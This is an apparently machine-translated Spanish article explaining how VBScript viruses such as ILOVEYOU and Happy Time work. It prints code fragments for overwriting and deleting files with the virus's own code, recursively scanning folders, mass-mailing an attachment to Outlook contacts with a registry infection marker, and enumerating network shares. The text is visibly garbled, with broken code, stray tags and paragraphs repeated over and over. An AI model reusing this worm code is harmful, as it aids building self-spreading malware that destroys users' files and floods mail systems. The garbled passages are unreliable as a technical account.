¿Cuáles son las características de los archivos con extensión vbs?
La popularidad de Internet ha hecho de nuestro mundo un lugar mejor, pero también puede traer cosas desagradables. Cuando recibes un correo electrónico con el asunto “Te amo” y estás tan emocionado que casi te tiembla el mouse al hacer clic en el archivo adjunto cuando navegas por un sitio web confiable y descubres que abrir cada carpeta es muy lento, ¿te das cuenta de que el asunto es “Te amo”? ¿El virus ha entrado en tu mundo? El 4 de mayo de 2000 estalló el gusano de red "macro virus". Propagándose a través de los sistemas de correo electrónico, los virus de macro atacaron millones de computadoras en todo el mundo en tan solo unos días. Los sistemas de red de muchas grandes empresas como Microsoft e Intel quedaron paralizados, provocando pérdidas económicas globales de miles de millones de dólares. El nuevo virus "Happy Hour" que estalló el año pasado todavía causa miseria a la mayoría de los usuarios de computadoras.
Los dos virus anteriores están relacionados con VBScript. Una razón muy importante por la que los virus VBScript, representados por virus de macro y nuevos virus de la hora feliz, están muy extendidos es que son fáciles de escribir. Analicemos todos los aspectos del virus de secuencia de comandos VBS uno por uno:
1 Características y estado de desarrollo del virus de secuencia de comandos Vbs
El virus VBS está escrito en secuencia de comandos VB, este lenguaje de secuencias de comandos Las funciones son. muy potentes. Aprovechan la apertura del sistema Windows y pueden acceder directamente al sistema de archivos y al registro llamando a algunos objetos y componentes existentes en Windows. El virus VBS puede controlar directamente el sistema de archivos, el registro, etc., y es muy poderoso. Hay que decir que un virus es un pensamiento, pero este pensamiento se vuelve extremadamente fácil de implementar con VBS. El virus de secuencia de comandos VBS tiene las siguientes características:
1. Es fácil de escribir y los entusiastas de los virus que no saben nada sobre virus pueden compilar nuevos virus en muy poco tiempo.
2. Fuerte poder destructivo. Su poder destructivo no sólo se refleja en la destrucción de los archivos del sistema y el rendimiento del usuario. También puede bloquear el servidor de correo y provocar una grave congestión en la red.
3. Altamente contagioso. Dado que el script se interpreta y ejecuta directamente y no requiere un procesamiento complejo de formato de archivo PE como los virus PE, este tipo de virus puede infectar directamente otros archivos similares mediante la autorreplicación y su propio manejo de excepciones también se vuelve muy sencillo.
4. Amplia gama de distribución. Estos virus pueden propagarse por todo el mundo en muy poco tiempo a través de archivos .html, archivos adjuntos de correo electrónico u otros medios.
5. El código fuente del virus es fácil de obtener y tiene muchas variantes. Dado que el virus VBS se interpreta y ejecuta, su código fuente es muy legible. Incluso si el código fuente del virus está cifrado, es relativamente sencillo obtener el código fuente. Por lo tanto, existen muchas variantes de este tipo de virus. Si la estructura del virus cambia ligeramente o el valor característico se modifica ligeramente, muchos programas antivirus pueden resultar indefensos.
6. Engañoso. Para tener la oportunidad de ejecutarse, los virus de script suelen utilizar varios medios para que los usuarios presten menos atención. Por ejemplo, el nombre del archivo adjunto de un correo electrónico utiliza un sufijo doble, como .jpg.vbs, ya que el sistema no muestra el archivo. sufijo de forma predeterminada, cuando el usuario ve este archivo, pensará que es un archivo de imagen jpg.
7. Facilitar la implementación a los creadores de virus. La llamada máquina de creación de virus es una máquina que puede crear virus según los deseos del usuario (por supuesto, se refiere a programas). La razón por la que la mayoría de las máquinas de creación de virus actuales son máquinas de creación de virus de script es por la interpretación e implementación. de scripts., es muy fácil de implementar, hablaremos de los detalles más adelante.
Debido a estas características, el desarrollo de los virus script es muy rápido, especialmente la aparición de máquinas productoras de virus, lo que hace que la generación de nuevos virus script sea muy fácil.
2. Análisis del principio de los virus de secuencias de comandos VBS
1. Cómo los virus de secuencias de comandos VBS infectan y buscan archivos
Los virus de secuencias de comandos VBS generalmente se replican directamente por sí mismos. Al infectar archivos, la mayor parte del código del virus se puede adjuntar directamente al medio de otros programas similares. Por ejemplo, la nueva versión del virus Happy Time puede adjuntar su propio código al final del archivo .htm y en la parte superior. del archivo .htm. htm, y en la parte superior del archivo, el código se agrega al final del archivo, y en la parte superior del archivo, el código se agrega al final del archivo. Por ejemplo, el nuevo virus Happy Hour agrega su código al final del archivo .htm y agrega una declaración en la parte superior que indica el código del virus, mientras que el virus Macro hace una copia del archivo, copia el código del virus en él y; utiliza el nombre del archivo original como prefijo del nombre del archivo del virus, con vbs como sufijo. virus en sí)
vbscopy=self.readall
' Lee todo el código del virus en la variable de cadena vbscopy...
set ap= fso.openentextfile( target.path,2,true)
' Write abre el archivo de destino y se prepara para escribir el código del virus
ap.write vbscopy ' sobrescribe el código del virus y sobrescribe el archivo de destino
ap.write vbscopy' Cubre el código del virus y sobrescribe el archivo de destino
set ap=fso.openentextfile(target.path,2,true)
' Escriba el archivo de destino abierto, listo para escribir el código del virus y cierre
set cop=fso.getfile(target-file.path) 'Obtener la ruta del archivo de destino
cop.copy(target- file.path & ".vbs")
' Crea otro archivo de virus (con .vbs como sufijo)
target.delete(true)
'Eliminar el archivo de destino
Lo anterior describe cómo el archivo de virus infecta archivos normales: primero, asigna el propio código del virus a la variable de cadena vbscopy, luego sobrescribe esta cadena en el archivo de destino y crea un archivo de destino con Haga una copia del archivo nombrado con el prefijo del nombre del archivo, vbs como prefijo del nombre del archivo, vbs como sufijo y, finalmente, elimine el archivo de destino.
A continuación analizamos en detalle el código de búsqueda de archivos:
'Esta función se utiliza principalmente para encontrar el archivo que cumple las condiciones y genera una copia viral del archivo correspondiente
sub scan(folder_) 'definición de la función de escaneo,
en caso de error, reanudar a continuación 'Si hay un error, salte directamente para evitar que aparezca una ventana de error
set folder_=fso.getfolder(folder_)
set files=folder_.files ' Conjunto de todos los archivos en el directorio actual
para cada archivo en fileext=fso.GetExtensionName(file)
p>'Obtener la extensión del archivo
ext=lcase(ext) 'Convertir el nombre de la extensión a minúsculas
si ext="mp5" luego 'Infectar si el nombre de la extensión es mp5.
Cree su propio archivo con una extensión adecuada, preferiblemente un archivo no normal para no interrumpir los programas normales.
Wscript.echo (archivo)
end ifnextset subfolders=folder_.subfolderspara cada subcarpeta en subcarpetas 'Buscar en otros directorios; llamar recursivamente
escanear() escanear ( subcarpeta)
siguiente
end sub
El código anterior es el análisis del código de búsqueda de archivos del virus de secuencia de comandos VBS. La parte de búsqueda de la función scan() utiliza un enfoque breve pero muy inteligente de recorrer todos los directorios y archivos de la partición utilizando un algoritmo recursivo.
2. Varias formas en que los virus de secuencias de comandos vbs se propagan a través de la red y el análisis de código.
Los virus de secuencias de comandos VBS tienen un amplio rango de propagación, dependiendo principalmente de sus funciones de propagación en la red. Scripts VBS Los virus se propagan de las siguientes maneras:
① Se propagan a través de archivos adjuntos de correo electrónico
Esta es una forma muy común de propagación. Los virus se pueden propagar a través de archivos adjuntos de correo electrónico
. Esta es una forma muy común de propagación. Los virus se pueden propagar a través de archivos adjuntos de correo electrónico.
Esta es una forma muy común de propagación. Los virus se pueden propagar a través de archivos adjuntos de correo electrónico.
Esta es una forma muy común de propagación. forma común de propagación. Los virus se pueden propagar a través de archivos adjuntos de correo electrónico
Esta es una forma muy común de propagación. Los virus se pueden propagar a través de archivos adjuntos de correo electrónico
Este es un método de comunicación muy común. . Esta es una forma muy común de propagación. El virus puede obtener direcciones de correo electrónico legítimas a través de varios métodos. El más común es obtener directamente la dirección de correo electrónico en la libreta de direcciones de Outlook. También puede buscar en documentos del usuario (como archivos html). a través de programas. Dirección de correo electrónico.
Así es como opera el virus VBScript:
Función mailBroadcast()
en caso de error, reanudar a continuación
wscript.echo
p >
Establecer outlookApp = CreateObject("Outlook.Application")
//Crear un objeto para la aplicación OUTLOOK
Si outlookApp= "Outlook" Entonces
Establecer mapiObj=outlookApp.CreateItem(0)
// Obtener la instancia del objeto de correo electrónico
Establecer addrEnt = addr.
/ Completar la dirección del destinatario
item.Subject = "Experimento de propagación de virus"
/Escribir título del correo electrónico
item.Body = "Esta es una prueba de propagación de virus por correo electrónico. Cuándo ¡No entre en pánico cuando reciba este correo electrónico!
" //Escribir contenido del archivo
Establecer adjuntoMents=item.Attachments //Definir archivos adjuntos de correo electrónico
attachMents .Agregar archivoSysObj.GetSpecialFolder(0)&"\test.Send
/ Enviar correo electrónico
shellObj .regwrite "HKCU\software\Mailtest\mailed", "1"
// Marca de virus para evitar infecciones repetidas
End If
NextEnd IfNext
End if
End Function
Fin de función
Fin p>
2) Propagación a través de ataques LAN
Los ataques LAN también son un método muy común y efectivo de transmisión de red. En términos generales, para facilitar la comunicación dentro de la LAN, debe haberlos. una gran cantidad de directorios compartidos de **** con permisos de escritura. Por ejemplo, cuando se crea un recurso compartido de **** en win2000, tiene permisos de escritura de forma predeterminada. ********************************************** ****** ********************************************** ******* **********************************.
En VBS, hay un objeto que le permite buscar y manipular archivos en la carpeta Network Neighborhood. Podemos utilizar este objeto con fines de propagación.
welcome_msg = "Prueba de búsqueda de conexión de red"
Establecer WSHNetwork = WScript.CreateObject("WScript.Network")
'Crear un objeto de red
Set oPrinters = WshNetwork.EnumPrinterConnections
'Crear una lista de conexiones de impresoras de red
WScript.Echo "Asignación de impresoras de red:"